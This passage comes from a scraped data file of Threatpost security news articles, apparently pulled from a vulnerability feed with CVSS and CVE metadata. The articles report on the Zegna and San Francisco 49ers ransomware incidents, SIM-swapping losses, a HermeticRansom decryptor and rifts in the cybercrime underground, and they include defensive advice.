IT systems,\u201d Zegna wrote in the filing, an SEC Form 424B3. 
These forms are used to update a company\u2019s investment prospectus, in this case to inform investors of risks related to cyber-incidents or data breaches.\n\nZegna gradually restored its IT systems \u2014 which include multiple server locations, third-party cloud providers and a range of software applications for different regions and functions \u2014 from secure back-up servers during the weeks following the breach, the company said.\n\n\u201cAlthough our systems are diversified\u2026 we periodically assess and implement actions to ameliorate risks to our systems, a significant or large-scale malfunction or interruption of our systems could adversely affect our ability to manage and keep our operations running efficiently, and damage our reputation if we are unable to track transactions and deliver products to our customers,\u201d the company said in the filing.\n\n## **Resisting the Pressure to Pay**\n\nWhile many companies choose to pay a ransom during such an attack to unlock data or prevent it from being leaked online, security professionals generally recommend that they don\u2019t because it only encourages cybercriminals.\n\nHowever, many ransomware groups now regularly resort to a method called [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>), in which they not only lock up victims\u2019 IT systems but also threaten to leak sensitive data online if the organization doesn\u2019t pay by a certain time, which [adds pressure](<https://threatpost.com/double-extortion-ransomware-data-leaks/176723/>) and often results in a quick payout.\n\n\u201cAs these things go, it\u2019s fantastic that Ermenegildo Zegna recovered without capitulating to the cybercriminal gang\u2019s ultimatums,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel, in an email to Threatpost. 
\u201cNot paying cybercriminals\u2019 extortion demands is one of the most effective ways to deter cyberattacks, but far too few companies that find themselves in similar situations to restore operations in a timely fashion.\u201d\n\nIndeed, even if they can restore via back-up systems, it\u2019s the hurry to get back online and fully operational that often makes organizations cave to demands. But with ransomware such a common occurrence in the threat landscape, there is no excuse for companies not to plan for a speedy in-house recovery in the event of an attack, he said.\n\n\u201cWe\u2019ve long since reached the point that organizations of any size and in any vertical must assume that they may potentially fall victim to a comparable cyberattack and implement a strategy not only for prevention, but also for restoring systems and data at company-wide scale should the worst happen,\u201d Clements said.\n\nThe attack on Zegna also reinforces the point that any organization, no matter how large or small, can be a target of ransomware attacks, he added. Though it\u2019s one of the top menswear brands in the world in terms of revenue, Zegna, for example, has about 6,500 employees globally \u2013 making it a relatively small fish compared to some global multinationals.\n\n\u201cWith ransomware extortion payouts routinely venturing into millions of dollars, cybercriminals have a powerful incentive to compromise every organization they are able to,\u201d Clements said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-12T17:22:38", "type": "threatpost", "title": "Menswear Brand Zegna Reveals Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-12T17:22:38", "id": "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "href": "https://threatpost.com/menswear-zegna-ransomware/179266/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T22:37:59", "description": "SIM-swapping \u2013 the practice of duping mobile carriers into switching a target\u2019s phone services to an attacker-controlled phone \u2013 is on the rise, the Feds are warning \u2013 leading to millions 
in losses for consumers who found their bank accounts drained and other accounts taken over.\n\nSubscriber Identity Modules (SIMs) are small chips inside mobile phones that allow the carrier to identify and register subscriber devices \u2013 a requirement to provide service to them. Most SIM-swapping attacks take the form of social engineering, where the criminals impersonate victims and convince customer-service agents to change over victims\u2019 services to new phones that they control.\n\nOnce the service has been redirected, the crooks have access to any of the victims\u2019 calls, texts, voicemails and saved profile data, which allows them to send \u201cForgot Password\u201d or \u201cAccount Recovery\u201d requests to the victim\u2019s email, which enables them to easily defeat two-factor authentication that uses one-time passcodes and thus to crack high-value accounts.\n\nWhile SIM-swapping (aka SIM-jacking) isn\u2019t a new practice, the attacks now seem to be accelerating at a rapid clip: Last year, the FBI Internet Crime Complaint Center (IC3) received 1,611 SIM swapping complaints with adjusted losses stemming from resulting account takeovers and data theft totaling more than $68 million, [it said this week](<https://www.ic3.gov/Media/Y2022/PSA220208>). In contrast, for the entire three-year period between January 2018 to December 2020, there were just 320 SIM-swapping complaints, with adjusted losses of approximately $12 million.\n\n## **SIM-Swapping: All Too Easy**\n\nIt\u2019s usually not a difficult plan to execute successfully, given that many carriers [don\u2019t ask in-depth security questions](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>) that fully verify that the caller is in fact the legitimate cell phone user. 
Often, the challenge questions can be answered with previously phished information or even with public information found on social-media sites.\n\nThe epidemic of large-scale data breaches also contributes to the gambit\u2019s high rate of success, according to Chris Clements, vice president of solutions architecture at Cerberus Sentinel.\n\n\u201cWhen people wonder what the consequences of large-scale data breaches are, this is exactly it,\u201d he noted via email. \u201cBoth people and companies have become conditioned to being able to verify identity through simple questions like Social Security number or mother\u2019s maiden name. Unfortunately, this falls apart completely when data breaches affecting millions of people routinely occur.\u201d\n\nOther attack vectors include phishing and insider-threat avenues. For instance, when it came to light in 2019 that Twitter CEO Jack Dorsey was the victim of a SIM swap, the New York Times [reported](<https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html>) that \u201chacking crews have paid off phone company employees to do\u2026switches for them, often for as little as $100 for each phone number.\u201d Again, this type of accomplice-cultivation isn\u2019t unusual \u2013 it [even resulted in a lawsuit](<https://threatpost.com/att-faces-224m-legal-challenge-over-sim-jacking-rings/136645/>) for AT&T in 2018.\n\nSIM-swapping is not just happening in the United States, either: The Spanish National Police, for instance, this week [busted open](<https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=11102>) a SIM-swapping ring that got around carriers\u2019 photo-based account verification by using non-original photos of victims to request swaps.\n\n## **Protection Responsibility Lies with Carriers**\n\nThere\u2019s very little that end users can do to avoid becoming victims of SIM-jacking jerks (although the FBI recommends a few protection steps, below). 
Primarily, it\u2019s the mobile phone company\u2019s responsibility to keep its house in order, researchers said.\n\n\u201cAll organizations, but especially service providers, must move from more simplistic means of validating identity to more sophisticated ones,\u201d Cerberus\u2019 Clements said. \u201cPIN codes unique to each user\u2019s account can be one way of adding additional security to the process. \u2018Out of wallet\u2019 questions are another alternative that works by verifying much-harder-to-compromise information such as last three home addresses or cars. It may be more of a hassle for everyone, but it\u2019s simply no longer viable to rely on information that has been routinely compromised to validate a person\u2019s identity.\u201d\n\nAnother best practice that all businesses can implement is to move on from SMS-based 2FA, others said.\n\n\u201cSIM-swapping attacks have been going on for over a decade and have likely resulted in billions in stolen cryptocurrency and other financial crime,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. \u201cSMS-based MFA has to be the most popular MFA option used on the internet, and most of the time, people do not have a choice of whether to use it or not. Their bank, vendor or service says they have to use it. And, let me say again, the U.S. government has said not to use it since 2017. The better question to ask is why so many services and vendors are still using SMS-based and phone-number based MFA five years after the U.S. government said not to use it? 
Why are we so slow and broken?\u201d\n\nThe FBI recommended this week that mobile carriers take the following precautions:\n\n * Educate employees and conduct training sessions on SIM swapping.\n * Carefully inspect incoming email addresses containing official correspondence for slight changes that can make fraudulent addresses appear legitimate and resemble actual clients\u2019 names.\n * Set strict security protocols enabling employees to effectively verify customer credentials before changing their numbers to a new device.\n * Authenticate calls from third-party authorized retailers requesting customer information.\n\n## **SIM-Swapping Consumer Protection Tips**\n\nThe FBI also recommended this week that individuals take the following precautions:\n\n * Do not advertise information about financial assets, including ownership or investment of cryptocurrency, on social-media websites and forums.\n * Do not provide your mobile number account information over the phone to representatives that request your account password or PIN. 
Verify the call by dialing the customer service line of your mobile carrier.\n * Avoid posting personal information online, such as mobile phone number, address or other personal identifying information.\n * Use a variation of unique passwords to access online accounts.\n * Be aware of any changes in SMS-based connectivity.\n * Use strong MFA methods such as biometrics, physical security tokens or standalone authentication applications to access online accounts.\n * Do not store passwords, usernames or other information for easy login on mobile device applications.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T22:13:33", "type": "threatpost", "title": "Sharp SIM-Swapping Spike Causes $68M in Losses", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T22:13:33", "id": "THREATPOST:795C39123EE147B39072C9434899E8FE", "href": 
"https://threatpost.com/sharp-sim-swapping-spike-losses/178358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T16:58:20", "description": "A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s [Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.\n\nThe fact that there was ransomware clinging to the data-wiping malware didn\u2019t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a \u201cbroader intrusion chain.\u201d\n\n> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. 
<https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the 
associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 
28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T02:13:10", "description": "The San Francisco 49ers were recently kneecapped by a BlackByte ransomware attack that temporarily discombobulated the NFL team\u2019s corporate IT network on the Big Buffalo Wing-Snarfing Day itself: Superbowl Sunday.\n\nBlackByte \u2013 a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who cut it in on a share of ransom profits \u2013 claimed responsibility for the attack by leaking files purportedly stolen in the cyber assault.\n\nThe 49ers confirmed the attack 
to Threatpost on Monday. The team\u2019s statement:\n\n\u201cWe recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.\u201d\n\nThe 49ers brought in third-party cybersecurity firms to assist and notified law enforcement. The team was still investigating as of Monday, but so far, it looks like the intrusion was limited to its corporate IT network and didn\u2019t affect ticket systems or systems at the team\u2019s home base, Levi\u2019s Stadium.\n\n\u201cTo date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi\u2019s Stadium operations or ticket holders,\u201d its statement said. \u201cAs the investigation continues, we are working diligently to restore involved systems as quickly and as safely as possible.\u201d\n\nJoseph Carson, chief security scientist and advisory CISO at privileged access management (PAM) solutions provider Delinea, suggested to Threatpost that it\u2019s likely that an affiliate hacked the 49ers, as opposed to the authors behind the ransomware, given that BlackByte is an RaaS.\n\nBlackByte recently posted some files purportedly stolen from the team on a dark web site in a file marked \u201c2020 Invoices.\u201d The gang hasn\u2019t made its ransom demands public. 
Nor has the group specified how much data it stole or encrypted.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14200002/blackbyte-49ers-e1644886822236.jpg>)\n\nSource: Ars Technica.\n\nCarson said that the Superbowl timing makes this one a classic case of cyber pests milking a major event: the kind of situation where they can get unsuspecting victims \u201cto click on links, download and execute malicious software or give over their credentials, thinking they are accessing a legitimate internet service, resulting in cybercriminals gaining initial access to networks and services. Once access is compromised, it is only a matter of time before ransomware is deployed.\u201d\n\n## Attack Follows Fast on Heels of Feds\u2019 Warning\n\nThe attack on the 49ers came two days after the FBI and Secret Service jointly announced ([PDF](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUUbpcdscHseLY8WazRItLnvQN0VOFtB523D1IckBDm3GWtAqMavOMkuJNpigwSlS1g-3D-3DHlt-_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad8NDtarbSFgOPpChaB5aAApmeE6Evp0nlfflzt6YSNEz28O2-2FHVrXE7UpGyDfGGnBrtBafeOs6MMZggCxPxBbybJxY4biqI68o3SzC6P2alu5pOZYg8dCtwmTO8AsZdPZl-2FU0cFcl7EEwBgimP9SeuFQXnQpQV9tiXU6qxQF2CVPNMtkNDR2cc1IBMMBK5HJ1DayKvUXhcyXH9vms3utwb-2BVTPSyYRG5jUH2iQhd-2BCWA-3D>)) that BlackByte ransomware has breached the networks of at least three organizations from U.S. 
critical infrastructure sectors in the last three months.\n\n\u201cAs of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture),\u201d the Feds said in a TLP:WHITE joint cybersecurity advisory released on Friday.\n\n## BlackByte\u2019s Back\n\nThe gang [emerged](<https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/>) in July 2021, when it started preying on organizations by exploiting known Microsoft Exchange [vulnerabilities](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) \u2013 such as [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) \u2013 to claw its way into environments.\n\nIt worked for a while: BlackByte scored wins against manufacturing, healthcare and construction industries in the United States, Europe and Australia. But the gang hit a wall when, months later, Trustwave released a free [decryption tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/>) that allowed BlackByte victims to unsnarl their files.\n\nAs Trustwave said in October, the security firm found BlackByte to be a ransomware weirdo, for these reasons:\n\n 1. Same as other notorious ransomware variants like REvil, BlackByte also avoids systems with Russian and ex-USSR languages.\n 2. It has a worm functionality similar to RYUK ransomware.\n 3. It creates a wake-on-LAN magic packet and sends it to the target host \u2013 making sure they are alive when infecting them.\n 4. The author hosted the encryption key in a remote HTTP server and in a hidden file with .PNG extension.\n 5. The author lets the program crash if it fails to download the encryption key.\n 6. 
The RSA public key embedded in the body is only used once, to encrypt the raw key to display in the ransom note \u2013 that\u2019s it.\n 7. The ransomware uses only one symmetric key to encrypt the files.\n\nAs far as BlackByte\u2019s auction site for selling victims\u2019 data goes, it\u2019s apparently a house of mirrors. While the site claims to contain exfiltrated data from victims, the ransomware itself doesn\u2019t have the ability to exfiltrate data, Trustwave\u2019s Rodel Mendrez and Lloyd Macrohon wrote. \u201cThis claim is probably designed to scare their victims into complying,\u201d they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14203910/BlackBytes-Onion-Site.png>)\n\nBlackByte\u2019s Onion site. Source: Trustwave.\n\nAs the Trustwave analysts pointed out in October, the group uses simplistic encryption techniques, using just one symmetric key to encrypt files in AES, as opposed to using unique keys for each session.\n\nBut despite the setback of Trustwave\u2019s decryptor and what experts think of as its simplistic encryption, BlackByte is clearly doing just fine, given the FBI/Secret Service alert on Friday.\n\nMatthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, called BlackByte a \u201cgrowing ransomware operator\u201d that\u2019s benefited from following successful patterns implemented by previous groups.\n\n\u201cSimilar to [Conti](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) ransomware, BlackByte has been identified using Exchange vulnerabilities such as ProxyShell to gain a foothold in environments,\u201d Warner observed to Threatpost on Monday. 
\u201cAdditionally, BlackByte utilizes well-proven tactics such as PowerShell exploitation of obfuscated base64 content to perform all encryption on hosts once exploited.\n\n\u201cIn the end, BlackByte is by no means more sophisticated than other actors in the ransomware universe but rather is the next up-and-coming player to exploit organizations and their data,\u201d Warner added via email.\n\n## Critical Infrastructure\n\nErich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte\u2019s success in penetrating the critical infrastructure sector: a sector that\u2019s been \u201cplagued\u201d by ransomware attacks, he said.\n\n\u201cThe criticality of the systems makes quick recovery vital, which increases the likelihood that the victims will pay the ransom,\u201d Kron said in a Monday email. \u201cThis same criticality also makes law enforcement attention much more likely. However, given the low success rate of law enforcement busts, this is often a chance the groups are willing to take.\u201d\n\nKron blamed limited budgets, aging equipment and shortages in cybersecurity staff for making critical infrastructure and many government entities especially vulnerable to ransomware attacks.\n\n\u201cThese groups must focus on the top attack vectors used in ransomware attacks, usually email phishing and attacks on remote access portals,\u201d he advised. \u201cTraining the users to spot and report phishing emails and improving the organizational security culture, along with ensuring remote access portals are monitored for brute force attacks and that credentials being used have Multi-Factor Authentication (MFA) enabled are some top ways to counter these threats.\u201d\n\n**_Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T02:04:36", "type": "threatpost", "title": "BlackByte Tackles the SF 49ers & US Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T02:04:36", "id": "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "href": 
"https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. 
For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. 
After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct 